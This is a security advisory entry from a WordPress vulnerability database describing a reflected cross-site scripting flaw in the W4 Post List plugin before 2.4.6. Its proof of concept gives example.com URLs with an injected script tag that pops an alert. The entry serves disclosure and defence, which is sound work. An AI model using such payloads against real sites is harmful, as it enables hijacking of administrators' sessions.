WordPress Plugin Vulnerabilities
W4 Post List < 2.4.6 - Reflected XSS
Description
The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting
Proof of Concept
Make a logged in admin open https://example.com/wp-admin/edit.php?post_type=w4pl&page=w4pl-docs&a"><script>alert(/XSS/)</script> On a page where there is a list with navigation displayed (put a [nav] in the template of the list) output, append the following payload: a"><script>alert(/XSS/)</script>, example: https://example.com/list/w4-post-list-1/?a"><script>alert(/XSS/)</script>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Erwan LR (WPScan)
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-22 (about 1 years ago)
Added
2023-03-22 (about 1 years ago)
Last Updated
2023-03-22 (about 1 years ago)